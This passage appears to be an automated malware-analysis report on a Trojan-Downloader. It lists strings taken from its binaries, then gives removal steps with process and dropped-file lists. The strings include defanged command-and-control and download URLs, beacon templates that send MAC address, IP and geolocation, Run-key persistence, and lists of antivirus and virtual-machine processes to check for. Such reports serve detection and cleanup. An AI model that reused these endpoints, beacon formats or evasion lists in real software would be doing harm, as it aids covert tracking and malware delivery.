mac=X-X-X-X-X-X&app=%s&uid=%s&ant=%d&ip=%s&lpn=%s&osrt=%d&inbar=%d&vm=%d&area=%d&sid=%s&ost=%s&hid=%s&geo=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ost=%s&hid=%s&ver=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ip=%s&fht=%d&olt=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ost=%s&hid=%s&ver=%s&ant=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&rt=%d&fr=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sn=%s&fn=%s&fs=%ld&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sil=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sid=%s&aplst=
smac=X-X-X-X-X-X&app=%s&uid=%s&rson=%d&msg=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&adid=%d&ver=%s&sid=%s
%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
\StringFileInfo\x\%s
\\.\PHYSICALDRIVE%d
HARDWARE\DEVICEMAP\Scsi\Scsi Port %d\Scsi Bus %d\Target Id 0\Logical Unit Id 0
1.0.0.15
WifiShare.rc

osmsg.exe_2564:

.text
`.rdata
@.data
.rsrc
@.reloc
(00356783465456)
XEle_IsShowEle
(%d),
(%d),name(%s)
API:%s()
,[%s]
=RegDeleteKeyExW
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Property not supported
cannot allocate thread context key
cannot join thread
src\Thread.cpp
src\Random.cpp
d:\sdk\poco-1.5.4\foundation\src\FileStream_WIN32.cpp
%<>{}|\"^`
https
bad or invalid port number
src\TemporaryFile.cpp
src\BinaryWriter.cpp
d:\sdk\poco-1.5.4\foundation\src\File_WIN32U.cpp
!_path.empty()
src\File.cpp
src\DateTime.cpp
src\Path.cpp
0 <= n && n <= _dirs.size()
!_dirs.empty()
src\DirectoryIteratorStrategy.cpp
src\ErrorHandler.cpp
src\TextConverter.cpp
src\Process.cpp
inPipe == 0 || (inPipe != outPipe && inPipe != errPipe)
Windows 3.x
Windows 95
Windows 98
Windows NT
Windows Vista/Server 2008
Windows 7/Server 2008 R2
Windows 8/Server 2012
Windows 2000
Windows XP
Windows Server 2003/Windows Server 2003 R2
Windows 95/Windows NT 4.0
Windows ME
x:x:x:x:x:x
src\TextIterator.cpp
d:\sdk\poco-1.5.4\foundation\src\bignum.h
d:\sdk\poco-1.5.4\foundation\src\bignum-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\bignum.cc
d:\sdk\poco-1.5.4\foundation\src\fast-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\strtod.cc
d:\sdk\poco-1.5.4\foundation\src\double-conversion.cc
src\NumericString.cpp
windows-1250
Windows-1250
windows-1251
Windows-1251
windows-1252
Windows-1252
cannot create named event %s [Error %d: %s]
anonymous pipe
d:\sdk\poco-1.5.4\foundation\src\PipeImpl_WIN32.cpp
src\Net.cpp
Network failure while reading HTTP request header
Error reading HTTP request header
No HTTP request header
HTTP request method invalid or too long
HTTP request URI invalid or too long
Invalid HTTP version string
Unsupported Media Type
HTTP Version not supported
No HTTP response header
Invalid HTTP status code
HTTP reason string too long
HTTP/1.0
HTTP/1.1
Cannot set the port number for an already connected session
Cannot set the proxy host and port for an already connected session
Cannot set the proxy port number for an already connected session
hXXp://
src\SocketAddress.cpp
!hostAndPort.empty()
Missing port number
Invalid address length passed to SocketAddress()
unsupported IP address family
HTTP Exception
Unsupported HTTP redirect (protocol change)
FTP Exception
SMTP Exception
WebSocket Exception
Unknown or unsupported socket family.
src\MessageHeader.cpp
HttpOnly
; HttpOnly
()[]/|\',;
Invalid or unsupported address family passed to IPAddress()
0.0.0.0
Invalid address length passed to IPAddress()
Invalid prefix length passed to IPAddress()
src\HTTPSession.cpp
src\HTTPHeaderStream.cpp
src\HTTPStream.cpp
src\HTTPFixedLengthStream.cpp
src\HTTPChunkedStream.cpp
src\HostEntry.cpp
src\Socket.cpp
Invalid or unsupported address family passed to StreamSocketImpl
255.255.255.255
src\IPAddressImpl.cpp
mask() is only supported for IPv4 addresses
src\SocketImpl.cpp
Operation would block
Operation now in progress
Operation already in progress
Socket operation attempted on non-socket
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported
hXXp://VVV.appinf.com/features/no-whitespace-in-element-content
hXXp://xml.org/sax/features/validation
hXXp://xml.org/sax/features/namespaces
hXXp://xml.org/sax/features/namespace-prefixes
hXXp://xml.org/sax/features/external-general-entities
hXXp://xml.org/sax/features/external-parameter-entities
hXXp://xml.org/sax/features/string-interning
hXXp://xml.org/sax/properties/declaration-handler
hXXp://xml.org/sax/properties/lexical-handler
hXXp://VVV.appinf.com/features/enable-partial-reads
src\NamePool.cpp
src\ParserEngine.cpp
Unexpected parser state - please send a bug report
Requested feature requires XML_DTD support in Expat
!_context.empty()
Unsupported SAX feature or property identifier
src\EntityResolverImpl.cpp
src\Element.cpp
src\XMLFilterImpl.cpp
xml=hXXp://VVV.w3.org/XML/1998/namespace
unexpected parser state - please send a bug report
requested feature requires XML_DTD support in Expat
expat_2.1.0
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://VVV.w3.org/2000/xmlns/
0 <= i && i < static_cast<int>(_attributes.size())
src\AttributesImpl.cpp
src\AbstractContainerNode.cpp
Data is specified for a node which does not support data
The implementation does not support the type of object requested
A parameter or an operation is not supported by the underlying object
src\ElementsByTagNameList.cpp
src\AttrMap.cpp
src\DTDMap.cpp
src\ChildNodesList.cpp
hXXp://VVV.w3.org/xmlns/2000/
src\NamespaceSupport.cpp
_contexts.size() > 0
Not a valid registry key
: type not supported
Cannot open registry key:
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
Not a valid root key
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
inflate 1.2.5 Copyright 1995-2010 Mark Adler
MaxPolicyElementKey
pExecutionResource
Unsupported or invalid date/time format
%w, %e %b %r %H:%M:%S %Z
%W, %e %b %r %H:%M:%S %Z
%Y-%m-%dT%H:%M:%S%z
%Y-%m-%dT%H:%M:%s%z
%w, %e %b %y %H:%M:%S %Z
%w, %e %b %Y %H:%M:%S %Z
%w, %d %b %Y %H:%M:%S %Z
%W, %e-%b-%y %H:%M:%S %Z
%W, %e %b %y %H:%M:%S %Z
%w %b %f %H:%M:%S %Y
%Y-%m-%d %H:%M:%S
src\MemoryPool.cpp
src\URIStreamOpener.cpp
src\FileStreamFactory.cpp
uri.isRelative() || uri.getScheme() == "file"
CoInitializeEx failed: %x
Failed to create an instance of ITaskService: %x
ITaskService::Connect failed: %x
ITaskService::GetFolder failed: %x
..\..\Src\Common\CommUtils.cpp
%s[%d]
http\shell\open\command
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes
hXXp://VVV.sogou.com/favicon.ico
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\%s
FaviconURLFallback
%s[%d]:%s
Chrome
Mozilla Firefox
Opera
Zihu.exe
QtWeb
SeaMonkey
Mozilla Firefox 29.0.0.0 Nightly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_USERS\%s\Software\%s
HKEY_CURRENT_USER\Software\%s
user32.dll
HKEY_USERS\%s\Software\%s\appInstall\%s
HKEY_CURRENT_USER\Software\%s\appInstall\%s
HKEY_USERS\%s\Software\%s\appInstall\
HKEY_CURRENT_USER\Software\%s\appInstall\
ntdll.dll
kernel32.dll
Wtsapi32.dll
explorer.exe
winlogon.exe
Process token open Error: %u
Lookup Privilege value Error: %u
DuplicateTokenEx Error: %u
CreateProcessAsUser Error: %u
User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
collect0.eszju.cn
mac=%s&app=%s&uid=%s&serno=%s&mos=%s&mip=%s&sid=%s
mac=%s&app=%s&uid=%s&serno=%s&sid=%s
mac=X-X-X-X-X-X&serno=%s&mos=%s&app=%s&uid=%s&sn=%s&fn=%s&fs=%ld&mifr=%s&sid=%s
F:\pz_git\vendor\inc\Poco/String.h
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
Rasapi32.dll
HKEY_USERS\%s\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
..\..\Src\Common\OperatingSystem.cpp
.d
Please contact to [email protected] for more information.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
X:X:X:X:X:X
dnsapi.dll
X-X-X-X-X-X
%d.%d.%d.%d
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
..\..\Src\Common\Adapter.cpp
F:\pz_git\vendor\inc\Poco/SharedPtr.h
F:\pz_git\vendor\inc\Poco/ActiveMethod.h
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
: this object does't support a special last block
: this object doesn't support multiple channels
is not a valid key length
F:\pz_git\bin\osTip.pdb
HttpQueryInfoA
InternetOpenUrlW
WININET.dll
ShellExecuteW
SetViewportOrgEx
ShellExecuteA
GDI32.dll
SHELL32.dll
VERSION.dll
GetProcessHeap
KERNEL32.dll
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExA
RegOpenKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
WS2_32.dll
IPHLPAPI.DLL
SHLWAPI.dll
GdiplusShutdown
gdiplus.dll
MSIMG32.dll
IMM32.dll
GetCPInfo
CreatePipe
RegQueryInfoKeyA
1.2.5
.?AVPropertyNotSupportedException@Poco@@
.?AVProcessHandleImpl@Poco@@
.?AVWindows1250Encoding@Poco@@
.?AVWindows1251Encoding@Poco@@
.?AVWindows1252Encoding@Poco@@
.?AVPipeImpl@Poco@@
.?AVHTTPException@Net@Poco@@
.?AVHTTPRequest@Net@Poco@@
.?AVHTTPMessage@Net@Poco@@
.?AVHTTPResponse@Net@Poco@@
.?AVHTTPClientSession@Net@Poco@@
.?AVHTTPSession@Net@Poco@@
.?AVUnsupportedRedirectException@Net@Poco@@
.?AVFTPException@Net@Poco@@
.?AVSMTPException@Net@Poco@@
.?AVWebSocketException@Net@Poco@@
.?AVUnsupportedFamilyException@Net@Poco@@
.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@
.?AVHTTPHeaderStreamBuf@Net@Poco@@
.?AVHTTPHeaderIOS@Net@Poco@@
.?AVHTTPHeaderInputStream@Net@Poco@@
.?AVHTTPHeaderOutputStream@Net@Poco@@
.?AVHTTPStreamBuf@Net@Poco@@
.?AVHTTPIOS@Net@Poco@@
.?AVHTTPInputStream@Net@Poco@@
.?AVHTTPOutputStream@Net@Poco@@
.?AVHTTPFixedLengthStreamBuf@Net@Poco@@
.?AVHTTPFixedLengthIOS@Net@Poco@@
.?AVHTTPFixedLengthInputStream@Net@Poco@@
.?AVHTTPFixedLengthOutputStream@Net@Poco@@
.?AVHTTPChunkedStreamBuf@Net@Poco@@
.?AVHTTPChunkedIOS@Net@Poco@@
.?AVHTTPChunkedInputStream@Net@Poco@@
.?AVHTTPChunkedOutputStream@Net@Poco@@
.?AVSAXNotSupportedException@XML@Poco@@
.?AVinvalid_operation@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AV?$_Func_base@HPAUIWebBrowser2@@PAPAUIDispatch@@PAFKPA_WPA_W@std@@
.?AV?$_Func_base@HPAUIWebBrowser2@@PAUIDispatch@@PA_WHPA_WPA_WPA_WPAF@std@@
.?AV?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_W2HPAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@@std@@
.?AV?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_WH222PAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@AAV?$_Ph@$06@4@AAV?$_Ph@$07@4@@std@@
.?AUDWebBrowserEvents2@@
.?AV?$_Func_impl@U?$_Callable_obj@V?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_W@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@@std@@$0A@@std@@V?$allocator@V?$_Func_class@HPAUIWebBrowser2@@PAUIDispatch@@PA_W@std@@@2@HPAUIWebBrowser2@@PAUIDispatch@@PA_W@std@@
.?AV?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAPAUIDispatch@@PAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAPAUIDispatch@@PAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@@std@@$0A@@std@@V?$allocator@V?$_Func_class@HPAUIWebBrowser2@@PAPAUIDispatch@@PAF@std@@@2@HPAUIWebBrowser2@@PAPAUIDispatch@@PAF@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_WH222PAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@AAV?$_Ph@$06@4@AAV?$_Ph@$07@4@@std@@$0A@@std@@V?$allocator@V?$_Func_class@HPAUIWebBrowser2@@PAUIDispatch@@PA_WHPA_WPA_WPA_WPAF@std@@@2@HPAUIWebBrowser2@@PAUIDispatch@@PA_WHPA_WPA_WPA_WPAF@std@@
.?AV?$_Func_base@HPAUIWebBrowser2@@PAPAUIDispatch@@PAF@std@@
.?AV?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_W@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAPAUIDispatch@@PAFKPA_W3@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@@std@@$0A@@std@@V?$allocator@V?$_Func_class@HPAUIWebBrowser2@@PAPAUIDispatch@@PAFKPA_WPA_W@std@@@2@HPAUIWebBrowser2@@PAPAUIDispatch@@PAFKPA_WPA_W@std@@
.?AV?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAPAUIDispatch@@PAFKPA_W3@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_W2HPAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@@std@@$0A@@std@@V?$allocator@V?$_Func_class@HPAUIWebBrowser2@@PAUIDispatch@@PA_WPA_WHPAF@std@@@2@HPAUIWebBrowser2@@PAUIDispatch@@PA_WPA_WHPAF@std@@
.?AVCXEventMsg@@
.?AV?$_Func_base@HPAUIWebBrowser2@@PAUIDispatch@@PA_WPA_WHPAF@std@@
.?AV?$_Func_base@HPAUIWebBrowser2@@PAUIDispatch@@PA_W@std@@
.?AVCXWebBrowser@@
.?AVHexEncoder@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
%Documents and Settings%\All Users\Application Data\WindowsMsg\osmsg.exe
00000000000000000001
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
XImage_LoadFile("%s"),
(%d),XC_ELE,ID(%d),bShow(%d)
(%d),XC_BUTTON,ID(%d),bShow(%d)
(%d),XC_RADIO,ID(%d),bShow(%d)
(%d),XC_CHECK,ID(%d),bShow(%d)
(%d),XC_EDIT,ID(%d),bShow(%d)
(%d),XC_RICHEDIT,ID(%d),bShow(%d)
(%d),XC_COMBOBOX,ID(%d),bShow(%d)
(%d),XC_SCROLLBAR,ID(%d),bShow(%d)
(%d),XC_SCROLLVIEW,ID(%d),bShow(%d)
(%d),XC_LIST,ID(%d),bShow(%d)
(%d),XC_LISTBOX,ID(%d),bShow(%d)
(%d),XC_TREE,ID(%d),bShow(%d)
(%d),XC_MENUBAR,ID(%d),bShow(%d)
(%d),XC_PROPERTYPAGE,ID(%d),bShow(%d)
(%d),XC_SLIDERBAR,ID(%d),bShow(%d)
(%d),XC_PROGRESSBAR,ID(%d),bShow(%d)
(%d),XC_TOOLBAR,ID(%d),bShow(%d)
(%d),XC_STATIC,ID(%d),bShow(%d)
(%d),XC_GROUPBOX,ID(%d),bShow(%d)
(%d),XC_PICTURE,ID(%d),bShow(%d)
(%d),XC_MONTHCAL,ID(%d),bShow(%d)
(%d),XC_DATETIME,ID(%d),bShow(%d)
(%d),XC_PROPERTYGRID,ID(%d),bShow(%d)
(%d),XC_CHOOSECOLOR,ID(%d),bShow(%d)
(%d),XC_OUTLOOK,ID(%d),bShow(%d)
(%d),XC_TEXTLINK,ID(%d),bShow(%d)
(%d),XC_TABBAR,ID(%d),bShow(%d)
(%d),XC_GIF,ID(%d),bShow(%d)
(%d),XC_EDITFILE,ID(%d),bShow(%d)
(%d),XC_LISTVIEW,ID(%d),bShow(%d)
(%d),XC_PANE,ID(%d),bShow(%d)
(%d),XC_DRAGBAR,ID(%d),bShow(%d)
(%d),XC_SCROLLVIEW_VIEW,ID(%d),bShow(%d)
(%d),XC_CAPTION,ID(%d),bShow(%d)
(%d),XC_MENUBAR_BUTTON,ID(%d),bShow(%d)
(%d),XC_TOOLBAR_BUTTON,ID(%d),bShow(%d)
(%d),XC_PROPERTYPAGE_LABEL,ID(%d),bShow(%d)
(%d),XC_PIER,ID(%d),bShow(%d)
(%d),XC_BUTTON_MENU,ID(%d),bShow(%d)
(%d),XC_VIRTUAL_ELE,ID(%d),bShow(%d)
(%d),XC_BUTTON_MIN,ID(%d),bShow(%d)
(%d),XC_BUTTON_MAX,ID(%d),bShow(%d)
(%d),XC_BUTTON_CLOSE,ID(%d),bShow(%d)
(%d),XC_TREE_SUPER,ID(%d),bShow(%d)
left:%d , top:%d , right:%d , bottom:%d
T.png
:[%s]!
title=%s
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
ADVAPI32.DLL
portuguese-brazilian
USER32.DLL
combase.dll
Tadvapi32.dll
res://ieframe.dll/navcancl.htm#
iframe.htm
ID:%d
ID:%d,
/OPENURL:
osmsg
32:HKEY_CURRENT_USER\Software\%s\actv;64:HKEY_CURRENT_USER\Software\%s\actv
HKEY_CURRENT_USER\Software\%s\actv
s%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
tmpData.ini
swapfile.ini
tEXPLORER.EXE
hXXp://upgrade.eszju.cn/
setup.exe
%s %s
hXXp://down.eszju.cn/%s
hXXp://down.eszju.cn/
"%s" /UPGRADE:"%s"
"%s" /UPGRADE:FINSIH
QQ.exe
procexp.exe
taskmgr.exe
AvastUI.exe
"%s" %s
hXXp://1111.ip138.com/ic.asp
hXXp://ip.chinaz.com/?IP=
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php
mac=X-X-X-X-X-X&app=%s&uid=%s&err=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ant=%d&ip=%s&lpn=%s&osrt=%d&inbar=%d&vm=%d&area=%d&sid=%s&ost=%s&hid=%s&geo=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ost=%s&hid=%s&ver=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ip=%s&fht=%d&olt=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ost=%s&hid=%s&ver=%s&ant=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sn=%s&fn=%s&fs=%ld&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&rt=%d&fr=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sil=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sid=%s&aplst=
smac=X-X-X-X-X-X&app=%s&uid=%s&rson=%d&msg=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&adid=%d&ver=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sid=%s&geo=%s
VBoxService.exe
VBoxTray.exe
VMwareUser.exe
VMUpgradeHelper.exe
VMwareTray.exe
vmacthlp.exe
vmtoolsd.exe
BaiduAn.exe
ekrn.exe
360sd.exe
BaiduSd.exe
360Safe.exe
360rp.exe
avguard.exe
360tray.exe
avgui.exe
avp.exe
BavSvc.exe
QQPCTray.exe
QQPCRTP.exe
kxescore.exe
KMService.exe
ksafe.exe
kxetray.exe
KSafeTray.exe
KSafeSvc.exe
KWatch.exe
KAVStart.exe
VPTray.exe
KMailMon.exe
Portuguese(Brazilian)
Portuguese(Standard)
yqsclient.exe
:puwin.exe
barrms.exe
Pubwin.exe
TLnbLdr.exe
BarClientView.exe
rwyNCMc.exe
eyoorun.exe
hintclinet.exe
PubwinClient.exe
clsmn.exe
fzclient.exe
mpclient.exe
recreation.exe
wxsyncli.exe
b\*.*
d\
Portugal
Turkey
Explorer.EXE
X\Explorer.Exe
\StringFileInfo\x\%s
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
\\.\PHYSICALDRIVE%d
HARDWARE\DEVICEMAP\Scsi\Scsi Port %d\Scsi Bus %d\Target Id 0\Logical Unit Id 0
1.0.0.55

nsf2A.tmp_236:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
WinHttpCrackUrl
HttpOpenRequestW
HttpSendRequestW
RegOpenKeyExW
RegCloseKey
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegQueryInfoKeyW
RegDeleteKeyW
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
GetCPInfo
.?AV?$_Ref_count_del@UHKEY__@@V<lambda3>@?A0xbc587dca@utils@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V<lambda1>@?A0xbc587dca@utils@@@tr1@std@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2A.tmp
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
wUser32.dll
Kernel32.dll
User32.dll
Gdi32.dll
WUser32.dll
lWinHttp.dll
eWinInet.dll
WinInet.dll
eKernel32.dll
WKernel32.dll
eUser32.dll
Advapi32.dll
sKernel32.dll
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\ProductName
tKernel32.dll
utils::ExecWait
dKernel32.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nss15.tmp:2748
    nss15.tmp:2668
    HY2F7WRL5V.exe:568
    AutoTime_51477.exe:4032
    win.exe:484
    AutoTime_51477.tmp:4080
    nsl1E.tmp:2172
    idscservice.exe:1368
    nsjB.tmp:1568
    %original file name%.exe:1756
    nsk1B.tmp:2824
    nsk1B.tmp:3456
    nsk1B.tmp:3440
    nsk1B.tmp:2856
    nsb10.tmp:2136
    qnsm13.tmp:2596
    qnsm13.tmp:2588
    testversion.exe:820
    osmsg.exe:2332
    regsvr32.exe:508
    hp.exe:2404
    nst25.tmp:3184
    mofcomp.exe:2556
    nst18.tmp:2976
    tiantianwifi.exe:2436

  2. Delete the original Trojan-Downloader file.
  3. Delete or disinfect the following files created/modified by the Trojan-Downloader:

    %Program Files%\SpaceSoundPro\SpaceSoundPro.dll (37993 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\SpaceSoundPro 1.0\Uninstall.lnk (734 bytes)
    %Documents and Settings%\%current user%\Desktop\SpaceSoundPro.lnk (742 bytes)
    %Program Files%\SpaceSoundPro\SpaceSoundPro.exe (87303 bytes)
    %Program Files%\SpaceSoundPro\silentconfigurator.exe (5215 bytes)
    %Program Files%\SpaceSoundPro\silentunconfigurator.exe (3502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (11 bytes)
    %Program Files%\SpaceSoundPro\Uninstall.exe (1328 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISpcre.dll (6382 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\AccessControl.dll (13 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\SpaceSoundPro 1.0\SpaceSoundPro.lnk (754 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-911CL.tmp\AutoTime_51477.tmp (6356 bytes)
    %Program Files%\Caster\Uninstaller.exe (8008 bytes)
    %Program Files%\Caster\wizzcaster.exe (39028 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\HelpTool.dll (10815 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\AutoTime.exe (23811 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_RegDLL.tmp (4 bytes)
    %Documents and Settings%\%current user%\Application Data\UPUpdata\AutoTime_51477.exe (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ui.dll (70 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX\testversion.exe (245098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX\win.exe (13484 bytes)
    %Program Files%\SpaceSoundPro\config.conf (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\Uninstall.exe (1184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp (37949 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\KillProcDLL.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\nsb10.tmp (9608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\WmiInspector.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsuC.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk1C.tmp (15 bytes)
